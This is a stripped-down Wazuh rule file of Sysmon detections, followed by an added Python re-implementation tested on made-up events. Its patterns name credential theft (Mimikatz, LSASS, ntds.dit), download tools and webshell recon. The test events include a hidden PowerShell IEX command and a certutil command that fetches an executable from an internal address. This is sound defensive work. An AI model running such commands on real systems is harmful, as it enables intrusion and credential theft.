227 | 228 | 229 | 230 | 231 | sysmon_linux_event1 232 | nmap 233 | SysmonForLinux - Nmap usage detected. 234 | recon, 235 | 236 | 237 | -------------------------------------------------------------------------------- /custom_sysmon_rules.xml: -------------------------------------------------------------------------------- 1 | 4 | 5 | 6 | 7 | sysmon_event1 8 | rundll32.exe$ 9 | Sysmon - rundll32.exe execution 10 | 11 | 12 | 13 | 300000 14 | vaultcli.dll 15 | Sysmon - Possible Mimikatz Running In-Memory 16 | 17 | 18 | 19 | 300000 20 | wlanapi.dll 21 | Sysmon - Possible Mimikatz In-Memory 22 | 23 | 24 | 25 | 26 | sysmon_event1 27 | mshta.exe$ 28 | Sysmon - mshta.exe 29 | 30 | 31 | 32 | 300020 33 | cmd.exe$|powershell.exe$|wscript.exe$|cscript.exe$|sh.exe$|bash.exe$|reg.exe$|regsvr32.exe$|BITSADMIN* 34 | Sysmon - Detected a Windows command line executable started from MSHTA 35 | 36 | 37 | 38 | 39 | sysmon_event1 40 | WINWORD.EXE$|EXCEL.EXE$|POWERPNT.exe$|MSPUB.exe$|VISIO.exe$ 41 | Sysmon - MS Office binary running 42 | 43 | 44 | 45 | 46 | 300040 47 | cmd.exe$ 48 | Sysmon - Possible Office Macro Started : $(win.eventdata.image) 49 | 50 | 51 | 300040 52 | cmd.exe$|powershell.exe$|wscript.exe$|cscript.exe$|sh.exe$|bash.exe$|scrcons.exe$|schtasks.exe$|regsvr32.exe$|hh.exe$ 53 | Sysmon - Microsoft Office Product Spawning Windows Shell 54 | 55 | 56 | 57 | sysmon_event8 58 | lsass.exe$ 59 | Sysmon - Lsass target 60 | 61 | 62 | 63 | 300060 64 | null 65 | Sysmon - Password Dumper Remote Thread in LSASS 66 | 67 | 68 | 69 | sysmon_event8 70 | Sysmon - Remote Thread Creation Detected from $(win.eventdata.sourceImage) to $(win.eventdata.targetImage), might indicate process injection! 
71 | 72 | 73 | 74 | 75 | sysmon_event3 76 | rundll32.exe$ 77 | Sysmon - Rundll32 communicating over the network 78 | 79 | 80 | 81 | 300080 82 | Sysmon - Rundll32 communicating over the network 83 | 84 | 85 | 86 | sysmon_event1 87 | certutil.exe$ 88 | Sysmon - Certutil execution 89 | 90 | 91 | 92 | 300100 93 | URL|decode|decodehex|urlcache|ping 94 | Sysmon - Certutil used to download or decode 95 | 96 | 97 | 98 | 99 | sysmon_event1 100 | control.exe$ 101 | Sysmon - Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits 102 | 103 | 104 | 105 | 106 | 300120 107 | rundll32.exe$ 108 | Sysmon - Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits 109 | 110 | 111 | 112 | 300121 113 | timedate.cpl 114 | Sysmon - Exclude 115 | 116 | 117 | 118 | sysmon_event6 119 | \\Temp 120 | Sysmon - Detects a driver load from a temporary directory 121 | 122 | 123 | 124 | sysmon_event1 125 | ^C:\\\\PerfLogs\\\\|^C:\\\\\$Recycle.bin\\\\|^C:\\\\Intel\\\\Logs\\\\|^C:\\\\Users\\\\Default\\\\|^C:\\\\Users\\\\Public\\\\|^C:\\\\Users\\\\NetworkService\\\\|^C:\\\\Windows\\\\Fonts\\\\|^C:\\\\Windows\\\\Debug\\\\|^C:\\\\Windows\\\\Media\\\\|^C:\\\\Windows\\\\Help\\\\|^C:\\\\Windows\\\\addins\\\\|^C:\\\\Windows\\\\repair\\\\|^C:\\\\Windows\\\\security\\\\|\\\\RSA\\\\MachineKeys\\\\|^C:\\\\Windows\\\\system32\\\\config\\\\systemprofile 126 | Sysmon - Detects process starts of binaries from a suspicious folder 127 | 128 | 129 | 130 | sysmon_event1 131 | mmc.exe$ 132 | Sysmon - Processes started by MMC could be a sign of lateral movement using the MMC application COM object 133 | 134 | 135 | 136 | 300160 137 | cmd.exe$ 138 | Sysmon - Processes started by MMC could be a sign of lateral movement using the MMC application COM object 139 | 140 | 141 | 142 | 300160 143 | powershell.exe$ 144 | Sysmon - Processes started by MMC could be a sign of lateral movement using the MMC application COM object 145 | 146 | 147 | 148 | 149 | 150 | 
151 | sysmon_event1 152 | net.exe$|net1.exe$ 153 | Detects execution of Net.exe, whether suspicious or benign. 154 | 155 | 156 | 157 | 158 | 300180 159 | group|localgroup|user|view|share|accounts|use 160 | Sysmon - Detects execution of Net.exe, whether suspicious or benign 161 | 162 | 163 | 164 | 300180 165 | net group "domain admins" /domain|net localgroup administrators|net1 group "domain admins" /domain|net1 localgroup administrators 166 | Sysmon - Enumeration of privileged users/groups 167 | 168 | 169 | 170 | sysmon_event1 171 | wscript.exe$|cscript.exe$ 172 | Sysmon - wscript/cscript.exe 173 | 174 | 175 | 176 | 300200 177 | powershell.exe$ 178 | Sysmon - Detects suspicious powershell invocations from interpreters or unusual programs 179 | 180 | 181 | 182 | 183 | 300200 184 | cmd.exe$ 185 | Sysmon - Detects suspicious cmd.exe invocations from interpreters or unusual programs 186 | 187 | 188 | 189 | 300200 190 | getfilecounts.vbs 191 | Sysmon - Exclude 192 | 193 | 194 | 195 | sysmon_event1 196 | regsvr32.exe$ 197 | Sysmon - Detects various anomalies in relation to regsvr32.exe 198 | 199 | 200 | 201 | 300220 202 | \\\\Temp 203 | Sysmon - Detects various anomalies in relation to regsvr32.exe 204 | 205 | 206 | 207 | 300220 208 | powershell.exe 209 | Sysmon - Detects various anomalies in relation to regsvr32.exe 210 | 211 | 212 | 213 | 300220 214 | scrobj.dll 215 | Sysmon - Detects various anomalies in relation to regsvr32.exe 216 | 217 | 218 | 219 | sysmon_event1 220 | schtasks.exe$ 221 | Sysmon - Detects the creation of scheduled tasks in user session 222 | 223 | 224 | 225 | 300240 226 | /create 227 | Sysmon - Detects the creation of scheduled tasks in user session 228 | 229 | 230 | 231 | sysmon_event1 232 | wscript.exe$|cscript.exe$ 233 | Sysmon - Detects various anomalies in relation to wscript/cscript 234 | 235 | 236 | 237 | 300260 238 | jse|vbe|js|vba 239 | Sysmon - Detects suspicious file execution by wscript and cscript 240 | 241 | 242 | 243 | 244 | 
sysmon_event1 245 | svchost.exe$ 246 | Sysmon - Suspicious Svchost Process 247 | 248 | 249 | 250 | 300280 251 | services.exe$ 252 | Sysmon - Detects a suspicious svchost process start 253 | 254 | 255 | 256 | 257 | sysmon_event1 258 | vssadmin.exe Delete Shadows|vssadmin create shadow|GLOBALROOT|vssadmin delete shadows|reg SAVE HKLM\\\\SYSTEM|\\\\windows\\\\ntds\\\\ntds.dit 259 | Sysmon - Detects suspicious commands that could be related to activity that uses volume shadow copy 260 | 261 | 262 | 263 | sysmon_event1 264 | wmic.exe$ 265 | Sysmon - Detects WMI executing suspicious commands 266 | 267 | 268 | 269 | 300320 270 | process call create|AntiVirusProduct get|FirewallProduct get|shadowcopy delete 271 | Sysmon - Detects WMI executing suspicious commands 272 | 273 | 274 | 275 | 276 | 277 | 278 | 279 | sysmon_event1 280 | transport=dt_socket,address= 281 | Sysmon - Detects a JAVA process running with remote debugging allowing more than just localhost to connect 282 | 283 | 284 | 285 | sysmon_event1 286 | WINWORD.EXE$|EXCEL.EXE$|POWERPNT.exe$|MSPUB.exe$|VISIO.exe$ 287 | Sysmon - MS Office binary running 288 | 289 | 290 | 291 | 300360 292 | sysmon_event1 293 | csc.exe$ 294 | Sysmon - Detects Office process starting uncommon sub process csc.exe as used in exploits 295 | 296 | 297 | 298 | 300361 299 | xj6r_ru4.cmdline 300 | Sysmon - Exclude 301 | 302 | 303 | 304 | sysmon_event1 305 | apache|tomcat|w3wp.exe$|php-cgi.exe$|nginx.exe$|httpd.exe$ 306 | Sysmon - Webshell detection 307 | 308 | 309 | 310 | 300380 311 | whoami|net user|ping -n|systeminfo 312 | Sysmon - Webshell detection 313 | 314 | 315 | 316 | sysmon_event1 317 | bitsadmin.exe$ 318 | Sysmon - Bitsadmin.exe detection 319 | 320 | 321 | 322 | 300400 323 | /transfer 324 | Sysmon - Detects usage of bitsadmin to download a file 325 | 326 | 327 | 328 | 329 | 184666 330 | MsMpEng.exe 331 | Sysmon - Exclude 332 | 333 | 334 | 335 | sysmon_event1 336 | mshta.exe$ 337 | Sysmon - mshta.exe detected 338 | 339 | 340 | 341 | 342 | 343 | 
sysmon_event1 344 | conhost.exe$ 345 | Sysmon - Mimikatz Detection Parent Image $(win.eventdata.parentImage) 346 | 347 | 348 | 300460 349 | mimikatz.exe$ 350 | Sysmon - Mimikatz Detection Image: $(win.eventdata.parentImage) 351 | 352 | 353 | 354 | 355 | sysmon_event1 356 | mimikatz.exe$ 357 | Sysmon - Mimikatz Execution Detected 358 | 359 | 360 | 361 | --------------------------------------------------------------------------------
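Most rules in custom_sysmon_rules.xml are parent/child process relationships on Sysmon event 1 (Office spawning a shell, mshta or a script host spawning cmd/powershell, control.exe spawning rundll32 with timedate.cpl excluded, a web server process running whoami/net user/systeminfo), plus command-line rules for certutil, bitsadmin, wmic, net.exe and the vssadmin/ntds.dit family, a suspicious-folder regex on the image path, and event 8 remote-thread rules with LSASS as target. The example below is added here and is not code from the repository: it re-implements that logic in Python over constructed Sysmon events so the chains and exclusions can be checked offline, including the case where the parent/child pair matches but the exclusion (timedate.cpl) suppresses the alert. Field names follow the `win.eventdata.*` keys the rule descriptions use (image, parentImage, commandLine, sourceImage, targetImage); `eventID`, `startModule` and `imageLoaded` are assumed key names for this example, and the three exclusion strings are carried from the rule file unchanged.

```python
"""Sysmon event 1/8/3/6 rule evaluation (added example, not repository code)."""
import re


def basename(path):
    """Last path component, lower-cased, so rules compare executables by name."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


OFFICE = ("winword.exe", "excel.exe", "powerpnt.exe", "mspub.exe", "visio.exe")
SHELLS = ("cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "sh.exe", "bash.exe",
          "scrcons.exe", "schtasks.exe", "regsvr32.exe", "hh.exe")
WEB_SERVERS = ("w3wp.exe", "php-cgi.exe", "nginx.exe", "httpd.exe")

# Event 1 parent/child rules: (description, parent names, child names or None for
# any child, regex the commandLine must match or None, regex that excludes the event).
PARENT_CHILD_RULES = [
    ("Microsoft Office Product Spawning Windows Shell", OFFICE, SHELLS, None, None),
    ("Office process starting uncommon sub process csc.exe", OFFICE, ("csc.exe",), None,
     r"xj6r_ru4\.cmdline"),
    ("Windows command line executable started from MSHTA", ("mshta.exe",),
     SHELLS + ("reg.exe", "bitsadmin.exe"), None, None),
    ("Suspicious Rundll32 execution from control.exe", ("control.exe",), ("rundll32.exe",),
     None, r"timedate\.cpl"),
    ("Suspicious powershell/cmd invocation from a script interpreter",
     ("wscript.exe", "cscript.exe"), ("powershell.exe", "cmd.exe"), None, r"getfilecounts\.vbs"),
    ("Process started by MMC, possible lateral movement via MMC COM object", ("mmc.exe",),
     ("cmd.exe", "powershell.exe"), None, None),
    ("Webshell: web server process running recon commands", WEB_SERVERS, None,
     r"whoami|net user|ping -n|systeminfo", None),
]

# Event 1 command-line rules: (description, image names or None for any image, regex).
COMMANDLINE_RULES = [
    ("Certutil used to download or decode", ("certutil.exe",), r"url|decode|decodehex|urlcache|ping"),
    ("Bitsadmin used to download a file", ("bitsadmin.exe",), r"/transfer"),
    ("WMI executing suspicious commands", ("wmic.exe",),
     r"process call create|antivirusproduct get|firewallproduct get|shadowcopy delete"),
    ("Enumeration of privileged users/groups", ("net.exe", "net1.exe"),
     r'group "domain admins" /domain|localgroup administrators'),
    ("Suspicious volume shadow copy / credential store access", None,
     r"vssadmin(?:\.exe)? (?:delete|create) shadow|globalroot|reg save hklm\\system|\\windows\\ntds\\ntds\.dit"),
]

SUSPICIOUS_FOLDER = re.compile(
    r"^C:\\(?:PerfLogs|\$Recycle\.bin|Intel\\Logs|Users\\(?:Default|Public|NetworkService)|"
    r"Windows\\(?:Fonts|Debug|Media|Help|addins|repair|security|system32\\config\\systemprofile))\\"
    r"|\\RSA\\MachineKeys\\", re.I)


def evaluate(ev):
    """Descriptions of every rule the event satisfies, in rule order."""
    hits = []
    eid = ev["eventID"]
    if eid == "1":
        image, parent = basename(ev["image"]), basename(ev.get("parentImage", ""))
        cmd = ev.get("commandLine", "")
        for desc, parents, children, need, exclude in PARENT_CHILD_RULES:
            if parent not in parents or (children and image not in children):
                continue
            if need and not re.search(need, cmd, re.I):
                continue
            if exclude and re.search(exclude, cmd, re.I):
                continue  # the "Exclude" child rule wins over the match
            hits.append(desc)
        for desc, images, pat in COMMANDLINE_RULES:
            if (images is None or image in images) and re.search(pat, cmd, re.I):
                hits.append(desc)
        if SUSPICIOUS_FOLDER.search(ev["image"]):
            hits.append("Process start of a binary from a suspicious folder")
        if image == "mimikatz.exe":
            hits.append("Mimikatz Execution Detected")
    elif eid == "8":
        if basename(ev["targetImage"]) == "lsass.exe":
            hits.append("Remote thread created in LSASS")
            if ev.get("startModule", "") in ("", "null", "-"):
                hits.append("Password Dumper Remote Thread in LSASS (no StartModule)")
        else:
            hits.append("Remote Thread Creation, possible process injection")
    elif eid == "3" and basename(ev["image"]) == "rundll32.exe":
        hits.append("Rundll32 communicating over the network")
    elif eid == "6" and re.search(r"\\Temp\\", ev.get("imageLoaded", ""), re.I):
        hits.append("Driver load from a temporary directory")
    return hits


# Constructed events for this example, not exported from a real agent.
SAMPLES = [
    {"eventID": "1", "image": r"C:\Windows\System32\cmd.exe",
     "parentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "commandLine": "cmd.exe /c powershell -nop -w hidden -c IEX(...)"},
    {"eventID": "1", "image": r"C:\Windows\System32\rundll32.exe",
     "parentImage": r"C:\Windows\System32\control.exe",
     "commandLine": r'"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\timedate.cpl",'},
    {"eventID": "1", "image": r"C:\Users\Public\svc.exe",
     "parentImage": r"C:\Windows\explorer.exe", "commandLine": r"C:\Users\Public\svc.exe"},
    {"eventID": "1", "image": r"C:\Windows\System32\certutil.exe",
     "parentImage": r"C:\Windows\System32\cmd.exe",
     "commandLine": "certutil.exe -urlcache -split -f http://10.0.0.5/p.exe p.exe"},
    {"eventID": "1", "image": r"C:\Windows\System32\cmd.exe",
     "parentImage": r"C:\Windows\System32\inetsrv\w3wp.exe", "commandLine": "cmd.exe /c whoami"},
    {"eventID": "8", "sourceImage": r"C:\Users\bob\AppData\Local\Temp\dump.exe",
     "targetImage": r"C:\Windows\System32\lsass.exe", "startModule": ""},
    {"eventID": "1", "image": r"C:\Windows\System32\cmd.exe",
     "parentImage": r"C:\Windows\explorer.exe", "commandLine": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for ev in SAMPLES:
        print(evaluate(ev) or ["-"], ev.get("image", ev.get("targetImage")))
```

The second sample is the one worth watching when tuning: control.exe launching rundll32.exe for timedate.cpl is the normal Date and Time dialog, and the exclusion has to suppress it without also hiding a rundll32 launched from control.exe with an attacker-supplied .cpl path. Wazuh applies the same precedence, since a child rule that matches last overrides the parent's alert level.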